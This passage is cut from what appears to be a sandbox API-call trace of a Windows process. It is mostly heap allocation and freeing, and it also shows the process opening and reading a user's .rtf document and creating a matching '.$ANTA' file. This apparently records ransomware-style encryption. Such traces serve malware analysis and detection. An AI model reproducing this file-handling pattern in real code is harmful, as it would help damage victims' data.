hHeap=0x1780000) returned 1 [0082.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3758 | out: hHeap=0x1780000) returned 1 [0082.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c36b0 | out: hHeap=0x1780000) returned 1 [0082.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff90 | out: hHeap=0x1780000) returned 1 [0082.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0082.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9338 | out: hHeap=0x1780000) returned 1 [0082.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3860 | out: hHeap=0x1780000) returned 1 [0082.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3668 | out: hHeap=0x1780000) returned 1 [0082.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3878 | out: hHeap=0x1780000) returned 1 [0082.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3698 | out: hHeap=0x1780000) returned 1 [0082.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3620 | out: hHeap=0x1780000) returned 1 [0082.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3b30 | out: hHeap=0x1780000) returned 1 [0082.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d68 | out: hHeap=0x1780000) returned 1 [0082.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea2e0 | out: hHeap=0x1780000) returned 1 [0082.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0082.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb288 | out: hHeap=0x1780000) returned 1 [0082.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb270 | out: hHeap=0x1780000) returned 1 [0082.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0082.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00a8 | out: hHeap=0x1780000) returned 1 [0082.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb378 | out: hHeap=0x1780000) returned 1 [0082.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb360 | out: hHeap=0x1780000) returned 1 [0082.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0082.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe78 | out: hHeap=0x1780000) returned 1 [0082.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb180 | out: hHeap=0x1780000) returned 1 [0082.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd60 | out: hHeap=0x1780000) returned 1 [0082.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0082.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff68 | out: hHeap=0x1780000) returned 1 [0082.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0c0 | out: hHeap=0x1780000) returned 1 [0082.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1b0 | out: hHeap=0x1780000) returned 1 [0082.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0082.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0008 | out: hHeap=0x1780000) returned 1 [0082.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb240 | out: hHeap=0x1780000) returned 1 [0082.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd88 | out: hHeap=0x1780000) returned 1 [0082.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0082.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01e8 | out: hHeap=0x1780000) returned 1 [0082.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb3d8 | out: hHeap=0x1780000) returned 1 [0082.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0082.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2ae8 | out: hHeap=0x1780000) returned 1 [0082.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0082.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2668 | out: hHeap=0x1780000) returned 1 [0082.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f28 | out: hHeap=0x1780000) returned 1 [0082.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2b8 | out: hHeap=0x1780000) returned 1 [0082.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb300 | out: hHeap=0x1780000) returned 1 [0082.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0082.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfec8 | out: hHeap=0x1780000) returned 1 [0082.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb168 | out: hHeap=0x1780000) returned 1 [0082.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0d8 | out: hHeap=0x1780000) returned 1 [0082.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01c0 | out: hHeap=0x1780000) returned 1 [0082.187] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0082.187] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0198 | out: hHeap=0x1780000) returned 1 [0082.187] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0f0 | out: hHeap=0x1780000) returned 1 [0082.187] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfea0 | out: hHeap=0x1780000) returned 1 [0082.187] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0082.187] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0080 | out: hHeap=0x1780000) returned 1 [0082.187] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb228 | out: hHeap=0x1780000) returned 1 [0082.187] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb258 | out: hHeap=0x1780000) returned 1 [0082.187] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0082.187] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffe0 | out: hHeap=0x1780000) returned 1 [0082.187] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0a8 | out: hHeap=0x1780000) returned 1 [0082.187] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0082.187] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0082.187] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0170 | out: hHeap=0x1780000) returned 1 [0082.187] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb090 | out: hHeap=0x1780000) returned 1 [0082.187] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2a0 | out: hHeap=0x1780000) returned 1 [0082.187] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb348 | out: hHeap=0x1780000) returned 1 [0082.187] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffb8 | out: hHeap=0x1780000) returned 1 [0082.187] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0082.187] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0082.187] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0082.187] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2960 [0082.187] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43eafd0 [0082.187] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29e0 [0082.187] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eafd0 | out: hHeap=0x1780000) returned 1 [0082.187] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0082.187] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0082.187] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac500 [0082.187] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0082.187] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac500 | out: hHeap=0x1780000) returned 1 [0082.187] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0082.187] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac740 | out: hHeap=0x1780000) returned 1 [0082.187] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0082.187] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29b0 [0082.187] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0198 [0082.187] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0082.188] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a60 [0082.188] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb090 [0082.188] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0082.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2d0 [0082.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a70 [0082.213] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0082.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac740 [0082.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43eb3a8 [0082.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb210 [0082.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29a0 [0082.213] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\Zjnf2x96GL5i.rtf" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\kc_ drhegb\\wz9w\\zjnf2x96gl5i.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0082.213] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.213] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144e7a8 | out: lpNewFilePointer=0x0) returned 1 [0082.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff68 [0082.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0a8 [0082.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a60 [0082.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb090 | out: hHeap=0x1780000) returned 1 [0082.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0082.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2d0 | out: hHeap=0x1780000) returned 1 [0082.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0198 | out: hHeap=0x1780000) returned 1 [0082.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0082.214] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0082.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ac0 [0082.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29e0 [0082.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2aa0 [0082.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f48 [0082.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0082.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f48 | out: hHeap=0x1780000) returned 1 [0082.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0082.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0082.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac040 [0082.214] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0082.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac040 | out: hHeap=0x1780000) returned 1 [0082.214] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0082.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29e0 [0082.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0082.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb168 [0082.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a70 [0082.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb300 [0082.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0082.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2d0 [0082.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29b0 [0082.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29f0 [0082.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ec8 [0082.215] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ec8 | out: hHeap=0x1780000) returned 1 [0082.215] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0082.215] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0082.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0c0 [0082.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29f0 [0082.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb270 [0082.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29b0 [0082.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb240 [0082.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a00 [0082.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb180 [0082.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ab0 [0082.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1f8 [0082.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a70 [0082.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1b0 [0082.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2960 [0082.215] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1f8 | out: hHeap=0x1780000) returned 1 [0082.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391c40 [0082.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a10 [0082.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x90) returned 0x4051040 [0082.215] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb180 | out: hHeap=0x1780000) returned 1 [0082.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x4359c08 [0082.215] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb270 | out: hHeap=0x1780000) returned 1 [0082.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43597f8 [0082.215] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4051040 | out: hHeap=0x1780000) returned 1 [0082.215] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0082.215] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1b0 | out: hHeap=0x1780000) returned 1 [0082.215] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0082.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391c40 | out: hHeap=0x1780000) returned 1 [0082.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0082.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4359c08 | out: hHeap=0x1780000) returned 1 [0082.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0082.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb240 | out: hHeap=0x1780000) returned 1 [0082.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0082.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ad0 [0082.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431e568 [0082.216] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\kc_ drhegb\\wz9w")) returned 0x10 [0082.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431e568 | out: hHeap=0x1780000) returned 1 [0082.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0082.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43597f8 | out: hHeap=0x1780000) returned 1 [0082.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0082.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0c0 | out: hHeap=0x1780000) returned 1 [0082.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0082.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac500 [0082.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43fb3b0 [0082.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1c8 [0082.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2950 [0082.216] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\Zjnf2x96GL5i.rtf.$ANTA" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\kc_ drhegb\\wz9w\\zjnf2x96gl5i.rtf.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0082.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00f8 [0082.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1e0 [0082.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29f0 [0082.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb300 | out: hHeap=0x1780000) returned 1 [0082.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb168 | out: hHeap=0x1780000) returned 1 [0082.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2d0 | out: hHeap=0x1780000) returned 1 [0082.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0148 | out: hHeap=0x1780000) returned 1 [0082.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0082.217] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0082.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2980 [0082.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a70 [0082.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b00 [0082.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0082.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0082.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0082.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0082.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0082.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac140 [0082.217] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0082.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac140 | out: hHeap=0x1780000) returned 1 [0082.217] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0082.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac780 [0082.217] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0082.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a30 [0082.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd60 [0082.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0f0 [0082.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ae0 [0082.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0082.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1b0 [0082.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2960 [0082.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2930 [0082.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796d88 [0082.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d88 | out: hHeap=0x1780000) returned 1 [0082.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0082.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0082.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2a0 [0082.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb288 [0082.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ae0 [0082.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e00020 [0082.221] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144e7f8 | out: lpNewFilePointer=0x0) returned 1 [0082.221] ReadFile (in: hFile=0x258, lpBuffer=0x43eb3a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144e820, lpOverlapped=0x0 | out: lpBuffer=0x43eb3a8*, lpNumberOfBytesRead=0x144e820*=0x873a, lpOverlapped=0x0) returned 1 [0082.222] ReadFile (in: hFile=0x258, lpBuffer=0x43eb3a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144e820, lpOverlapped=0x0 | out: lpBuffer=0x43eb3a8*, lpNumberOfBytesRead=0x144e820*=0x0, lpOverlapped=0x0) returned 1 [0082.222] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb288 | out: hHeap=0x1780000) returned 1 [0082.222] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0082.222] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2a0 | out: hHeap=0x1780000) returned 1 [0082.222] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2980 [0082.222] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x873a) returned 0x499a008 [0082.222] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e00020 | 